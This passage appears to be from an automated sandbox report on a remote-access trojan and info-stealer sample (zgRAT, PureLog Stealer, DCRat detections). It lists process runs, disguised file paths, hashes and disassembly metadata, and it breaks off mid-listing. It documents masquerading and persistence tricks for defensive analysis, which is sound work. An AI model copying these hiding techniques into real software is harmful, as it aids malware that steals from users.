                                                                Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rjP0QDXGdr.bat"
                                                                Imagebase:0x7ff7d23c0000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:29
                                                                Start time:19:36:04
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:30
                                                                Start time:19:36:04
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\chcp.com
                                                                Wow64 process (32bit):false
                                                                Commandline:chcp 65001
                                                                Imagebase:0x7ff6a5760000
                                                                File size:14'848 bytes
                                                                MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:31
                                                                Start time:19:36:05
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\w32tm.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                Imagebase:0x7ff720560000
                                                                File size:108'032 bytes
                                                                MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:32
                                                                Start time:19:36:05
                                                                Start date:10/10/2024
                                                                Path:C:\Users\user\Desktop\lv961v43L3.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Users\user\Desktop\lv961v43L3.exe
                                                                Imagebase:0xe50000
                                                                File size:3'554'304 bytes
                                                                MD5 hash:76802A2F25A771332D8C00EE56975818
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:33
                                                                Start time:19:36:05
                                                                Start date:10/10/2024
                                                                Path:C:\Users\user\Desktop\lv961v43L3.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Users\user\Desktop\lv961v43L3.exe
                                                                Imagebase:0xb70000
                                                                File size:3'554'304 bytes
                                                                MD5 hash:76802A2F25A771332D8C00EE56975818
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:34
                                                                Start time:19:36:05
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                Imagebase:0xe70000
                                                                File size:3'554'304 bytes
                                                                MD5 hash:76802A2F25A771332D8C00EE56975818
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 74%, ReversingLabs
                                                                Has exited:true

                                                                General

                                                                Target ID:35
                                                                Start time:19:36:05
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                Imagebase:0xfe0000
                                                                File size:3'554'304 bytes
                                                                MD5 hash:76802A2F25A771332D8C00EE56975818
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:36
                                                                Start time:19:36:05
                                                                Start date:10/10/2024
                                                                Path:C:\Users\Default\SystemSettings.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\Default User\SystemSettings.exe"
                                                                Imagebase:0x5a0000
                                                                File size:3'554'304 bytes
                                                                MD5 hash:76802A2F25A771332D8C00EE56975818
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\SystemSettings.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\SystemSettings.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\SystemSettings.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\SystemSettings.exe, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 74%, ReversingLabs
                                                                Has exited:true

                                                                General

                                                                Target ID:37
                                                                Start time:19:36:05
                                                                Start date:10/10/2024
                                                                Path:C:\Users\Default\SystemSettings.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\Default User\SystemSettings.exe"
                                                                Imagebase:0xed0000
                                                                File size:3'554'304 bytes
                                                                MD5 hash:76802A2F25A771332D8C00EE56975818
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:38
                                                                Start time:19:36:10
                                                                Start date:10/10/2024
                                                                Path:C:\Users\user\Desktop\lv961v43L3.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\Desktop\lv961v43L3.exe"
                                                                Imagebase:0x2b0000
                                                                File size:3'554'304 bytes
                                                                MD5 hash:76802A2F25A771332D8C00EE56975818
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:40
                                                                Start time:19:36:15
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe"
                                                                Imagebase:0x900000
                                                                File size:3'554'304 bytes
                                                                MD5 hash:76802A2F25A771332D8C00EE56975818
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 74%, ReversingLabs
                                                                Has exited:true

                                                                General

                                                                Target ID:41
                                                                Start time:19:36:24
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe"
                                                                Imagebase:0xf20000
                                                                File size:3'554'304 bytes
                                                                MD5 hash:76802A2F25A771332D8C00EE56975818
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000029.00000002.3272135764.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000029.00000002.3272135764.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000029.00000002.3272135764.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000029.00000002.3272135764.0000000003904000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000029.00000002.3272135764.00000000035B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Has exited:false

                                                                General

                                                                Target ID:43
                                                                Start time:19:36:32
                                                                Start date:10/10/2024
                                                                Path:C:\Users\Default\SystemSettings.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\Default User\SystemSettings.exe"
                                                                Imagebase:0x820000
                                                                File size:3'554'304 bytes
                                                                MD5 hash:76802A2F25A771332D8C00EE56975818
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Disassembly

                                                                Reset < >

                                                                  Executed Functions

                                                                  Function 00007FF84969AD5F Relevance: 3.1, Strings: 2, Instructions: 593COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: pN6I$x/6I
                                                                  • API String ID: 0-3869156419
                                                                  • Opcode ID: b57abaffc13a0a5f8611e405f9a175ae553d658f238a68c1daa256d1def9e40b
                                                                  • Instruction ID: 069ca31c7293309512552f43fae62805994ab01e519c68acbac54e28e4ac5c9a
                                                                  • Opcode Fuzzy Hash: b57abaffc13a0a5f8611e405f9a175ae553d658f238a68c1daa256d1def9e40b
                                                                  • Instruction Fuzzy Hash: B722D530D1C6998FEBA9EF28C4956B87BB1FF55344F5041BDD40EC7686DA38A981CB40
                                                                  Function 00007FF848F20D4C Relevance: 1.5, Strings: 1, Instructions: 253COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2109522442.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f20000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 5Z_H
                                                                  • API String ID: 0-3267294416
                                                                  • Opcode ID: 4e0589561ae5aa133cec486eef7dd60c12b2eafaf3be4ab4f63982d9de87a158
                                                                  • Instruction ID: aede34b2872e98883a7c7475306a9cec6fd41214a198c4885caee95e8ef44af7
                                                                  • Opcode Fuzzy Hash: 4e0589561ae5aa133cec486eef7dd60c12b2eafaf3be4ab4f63982d9de87a158
                                                                  • Instruction Fuzzy Hash: 8B91F072D1CA998FE78AEF6898697A9BFE1FB95350F0400BEC088D72D2CF7914548701
                                                                  Function 00007FF84969C1B7 Relevance: 5.1, Strings: 4, Instructions: 127COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: x/6I$x/6I$x/6I$x/6I
                                                                  • API String ID: 0-2511683733
                                                                  • Opcode ID: 899b79a98275525c7eb240e3319cd48c49e41207bb8db3d4155f2763084a5f92
                                                                  • Instruction ID: 13dda59fce1292f1a28979d950d13bac0a81f1246fe20d079de13561646167e5
                                                                  • Opcode Fuzzy Hash: 899b79a98275525c7eb240e3319cd48c49e41207bb8db3d4155f2763084a5f92
                                                                  • Instruction Fuzzy Hash: EF41A431A0C9498FDF98FF1CD4959A5B7E1FBA9314B0402AAD00EC7196DE38EC45CB85
                                                                  Function 00007FF84969C261 Relevance: 5.1, Strings: 4, Instructions: 120COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: x/6I$x/6I$x/6I$x/6I
                                                                  • API String ID: 0-2511683733
                                                                  • Opcode ID: 87e865ca490c1036764ac31403ccd930fce8b8d444c2424986b9e0f0c3f1ea71
                                                                  • Instruction ID: c22f22d40f7436cf82c3661eace2ead9171baa5bbe23ef09f4675b1544176c91
                                                                  • Opcode Fuzzy Hash: 87e865ca490c1036764ac31403ccd930fce8b8d444c2424986b9e0f0c3f1ea71
                                                                  • Instruction Fuzzy Hash: 55319131A0C9558FCB98EF2CC495EA577E1FBA9314B0402ADD00ECB296DE38EC45CB81
                                                                  Function 00007FF84969C1FB Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: x/6I$x/6I$x/6I$x/6I
                                                                  • API String ID: 0-2511683733
                                                                  • Opcode ID: 9e7dddc89e361508c13ab8ece1fe182d7a0131ac5d527885146788ef6040eb44
                                                                  • Instruction ID: 379ca867a7422b06f312bc19c667d7fdc02c0bedaaf4c29c414a680f6e4c265d
                                                                  • Opcode Fuzzy Hash: 9e7dddc89e361508c13ab8ece1fe182d7a0131ac5d527885146788ef6040eb44
                                                                  • Instruction Fuzzy Hash: AC318431A0C9458FCB98FF18D495AA577E1FBA9314B0402ADD00EC7196DE38EC45CB81
                                                                  Function 00007FF8492E4015 Relevance: 4.4, Strings: 3, Instructions: 690COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113807833.00007FF8492E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff8492e0000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: PR-I$PR-I$d
                                                                  • API String ID: 0-138381847
                                                                  • Opcode ID: 59a9d2b70da75ca11645aa6791c356f47e02b165e045876c9ee928c44e2e663f
                                                                  • Instruction ID: 415d83028e5b2c96678ac85d97288f724d7ebb7bf179cfc4accf4170957fc891
                                                                  • Opcode Fuzzy Hash: 59a9d2b70da75ca11645aa6791c356f47e02b165e045876c9ee928c44e2e663f
                                                                  • Instruction Fuzzy Hash: FB220F30A1CA4A8FEB59EF1CD48167173E1FFA5350B2442B9D45EC7296DA39F8438B81
                                                                  Function 00007FF848F20B3F Relevance: 3.8, Strings: 3, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2109522442.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f20000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: c9$!k9$"s9
                                                                  • API String ID: 0-3426396564
                                                                  • Opcode ID: feaa998f5ca3c220e03cd0105a0c752630588e44680650cacc5706f469bfa266
                                                                  • Instruction ID: ba731a2ff701c1ff3eb2f9f24a765302349bddb1563c4b93ddaa09ce362c202a
                                                                  • Opcode Fuzzy Hash: feaa998f5ca3c220e03cd0105a0c752630588e44680650cacc5706f469bfa266
                                                                  • Instruction Fuzzy Hash: A601493771D9664BD741773DFC905D8BB40EB9627679506BBD184C7192E241144AC3D0
                                                                  Function 00007FF84969BBB7 Relevance: 3.0, Strings: 2, Instructions: 475COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: hH.I$x/6I
                                                                  • API String ID: 0-1675140868
                                                                  • Opcode ID: 91eb4bd825fcc0e761ae81f09ccec3f661e330bb15107de859c3d3b837cc7985
                                                                  • Instruction ID: c4bd4fc54170949ea8dee6e88e954c4c326d1464f23c4185cfc4e5207125ede0
                                                                  • Opcode Fuzzy Hash: 91eb4bd825fcc0e761ae81f09ccec3f661e330bb15107de859c3d3b837cc7985
                                                                  • Instruction Fuzzy Hash: E8F1F23090DA8A8FE7B8EF28D4955B9B7E1FF45388F1405BEC04EC7582DE29B8458B41
                                                                  Function 00007FF84969CDD1 Relevance: 2.9, Strings: 2, Instructions: 445COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: dI$dI
                                                                  • API String ID: 0-4086891961
                                                                  • Opcode ID: 5d01284b1d70a07f2ce11ae3a5b04e60f14d23d473c5f75968552b8b99c7ab7a
                                                                  • Instruction ID: 5de5305c1fa1593271494564e131668f6e538adbaf9144ce37b2990a545ec976
                                                                  • Opcode Fuzzy Hash: 5d01284b1d70a07f2ce11ae3a5b04e60f14d23d473c5f75968552b8b99c7ab7a
                                                                  • Instruction Fuzzy Hash: 78616C52D1E1E39EE2B17FA864555F9AB50EF113E9F584277D14D8A0C38E0C288583E6
                                                                  Function 00007FF8492FF110 Relevance: 2.9, Strings: 2, Instructions: 383COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113807833.00007FF8492E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff8492e0000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @XAI$_
                                                                  • API String ID: 0-3760589585
                                                                  • Opcode ID: f2b6cbda2ffa3e3e2c8d1a759c4bc28889d96cae8e8c63cdd9b93e0ef50e35de
                                                                  • Instruction ID: 4fa0d22f5d06f91f1930d692ea719eca631cc0d56334b8d12f77024d36d7ff40
                                                                  • Opcode Fuzzy Hash: f2b6cbda2ffa3e3e2c8d1a759c4bc28889d96cae8e8c63cdd9b93e0ef50e35de
                                                                  • Instruction Fuzzy Hash: D0D11722D4EAD28FF3759E3458192B67F66BF62790F1D00FEC1588718FE528A90993C1
                                                                  Function 00007FF84969CE47 Relevance: 2.8, Strings: 2, Instructions: 298COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: dI$dI
                                                                  • API String ID: 0-4086891961
                                                                  • Opcode ID: c9ba228f5194a332646ddb70a9b606c52a1fbda32c0a90e7f3cf6380d2e806f5
                                                                  • Instruction ID: 0a235f5da25e341155562072586ad65117fb2572e54db24519649f8a89c6cbd4
                                                                  • Opcode Fuzzy Hash: c9ba228f5194a332646ddb70a9b606c52a1fbda32c0a90e7f3cf6380d2e806f5
                                                                  • Instruction Fuzzy Hash: BF21D302D1E1D38EF6F53F7824250F96650AF123E8F6802BAE54E870C2CC0C2886D3D6
                                                                  Function 00007FF849697E15 Relevance: 2.8, Strings: 2, Instructions: 287COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: x/6I$x/6I
                                                                  • API String ID: 0-1091020414
                                                                  • Opcode ID: 54a8e2419ba07ccbc60981ae9d658ae511fd685867d86ac1ed01959b04cc6726
                                                                  • Instruction ID: 70b570e3cc9e1f9028685a2e70033d6242b790db1dc0dc72a495ea4158783810
                                                                  • Opcode Fuzzy Hash: 54a8e2419ba07ccbc60981ae9d658ae511fd685867d86ac1ed01959b04cc6726
                                                                  • Instruction Fuzzy Hash: 7321D611D4D6D38EF6F97F39282507C6A40AF927D8F1806FAC54D8B0C2DC4C2C826B92
                                                                  Function 00007FF84969AEE0 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: pN6I$x/6I
                                                                  • API String ID: 0-3869156419
                                                                  • Opcode ID: de40b1ef86d350e1fac61d8e47c5facf1e0ff92dea990b1fa36711d99fe0d979
                                                                  • Instruction ID: b80e13697851f782496ac1fd939f1394a2fdeba1e5091b1ba2c5ed2dc310aef5
                                                                  • Opcode Fuzzy Hash: de40b1ef86d350e1fac61d8e47c5facf1e0ff92dea990b1fa36711d99fe0d979
                                                                  • Instruction Fuzzy Hash: 8D510330D1C99A8EEBE9AF2884652B8BBE1FF95344F0445B9C04EC75C6DE2C69858B41
                                                                  Function 00007FF84969D0D5 Relevance: 2.7, Strings: 2, Instructions: 172COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: dI$dI
                                                                  • API String ID: 0-4086891961
                                                                  • Opcode ID: ad418c1ae719cf1af39023d4ded8b1a6e8fae4503db702f8d822b7729373333e
                                                                  • Instruction ID: 2212e290ba03c8d92e0cf68502ca16e84318142340601376fd36f051754bd0aa
                                                                  • Opcode Fuzzy Hash: ad418c1ae719cf1af39023d4ded8b1a6e8fae4503db702f8d822b7729373333e
                                                                  • Instruction Fuzzy Hash: DA512D71D0C5999FDBA9EF18C864BF9BBB1FB58744F1040BAD00EE3291DA346A85CB50
                                                                  Function 00007FF84969A8E2 Relevance: 2.7, Strings: 2, Instructions: 166COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $x/6I
                                                                  • API String ID: 0-2578042046
                                                                  • Opcode ID: b5ef19cacdd23d2e3782220cbedcb73c6edc9074a998b2f30dd1b174b61acd19
                                                                  • Instruction ID: 0460b8fcd939799e08c7eadb240faf8cdfea4095d50e88bae0deec9735a7a265
                                                                  • Opcode Fuzzy Hash: b5ef19cacdd23d2e3782220cbedcb73c6edc9074a998b2f30dd1b174b61acd19
                                                                  • Instruction Fuzzy Hash: 16518E31D0D68A9FDBA9EFA8D4545BDB7F1FF59344F1040BAC00AE7286CA382905CB50
                                                                  Function 00007FF8492EAC08 Relevance: 2.7, Strings: 2, Instructions: 163COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113807833.00007FF8492E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff8492e0000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $hm.I
                                                                  • API String ID: 0-951409366
                                                                  • Opcode ID: 25cfb2ddae3c2def6c3561fa87f7d77a8324ed1b1664c159bf0eb69f0c2a37f0
                                                                  • Instruction ID: 3fddae57e6896983640f9fb2e6de57313aba7f6bd3e33715352d870a8bbf6751
                                                                  • Opcode Fuzzy Hash: 25cfb2ddae3c2def6c3561fa87f7d77a8324ed1b1664c159bf0eb69f0c2a37f0
                                                                  • Instruction Fuzzy Hash: CE511834D0C59A9FEB69EFA8D4905BDB7B1FF59341F1041BAC01EA7286CB386905CB50
                                                                  Function 00007FF849695218 Relevance: 2.7, Strings: 2, Instructions: 161COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $
                                                                  • API String ID: 0-227171996
                                                                  • Opcode ID: 8e8aaafcc2f0b499b50efd79f6d5900c4336937c5085ff49911296820bafdace
                                                                  • Instruction ID: c9e7d0b30dbc43f8e6147c30084158891185c3751b78bd58d20513a3df4f58ed
                                                                  • Opcode Fuzzy Hash: 8e8aaafcc2f0b499b50efd79f6d5900c4336937c5085ff49911296820bafdace
                                                                  • Instruction Fuzzy Hash: 3E518F30D0D68E9FDB99EF98D4646BDBBB2FF54344F1440BAC40AE7286DA782905CB50
                                                                  Function 00007FF849698254 Relevance: 2.5, Strings: 2, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2118761134.00007FF849690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849690000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849690000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: x/6I$x/6I
                                                                  • API String ID: 0-1091020414
                                                                  • Opcode ID: 6527ce3f0495217c681739f421ca3164c6364bc35ae23b3a21831ae145d91822
                                                                  • Instruction ID: 5ecda9884c83e6c746998fb3a437a99841f966b5a468c61d28e174686688705b
                                                                  • Opcode Fuzzy Hash: 6527ce3f0495217c681739f421ca3164c6364bc35ae23b3a21831ae145d91822
                                                                  • Instruction Fuzzy Hash: 6A01FF30D0C9999FDBE9EF188855768B7B1FF55344F0401E9C00DE7292CA3819849F12
                                                                  Function 00007FF8492E195F Relevance: 1.5, Strings: 1, Instructions: 296COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113807833.00007FF8492E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff8492e0000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: xF,I
                                                                  • API String ID: 0-3454612615
                                                                  • Opcode ID: 4227bd44f77b3cb7005517c1e0d072c9593cc7a84f831b4a7330e6d194078ffb
                                                                  • Instruction ID: 83d28ad4f364ecc3e0398cf58952e125d78bbcb1d7e2dac673e736235a496245
                                                                  • Opcode Fuzzy Hash: 4227bd44f77b3cb7005517c1e0d072c9593cc7a84f831b4a7330e6d194078ffb
                                                                  • Instruction Fuzzy Hash: 42B18C705186518FEB59DF18D0E0AB137A2FF49350B5056BDC85ECB68BDB38E892CB81
                                                                  Function 00007FF849692FAB Relevance: 1.5, Strings: 1, Instructions: 236COMMON
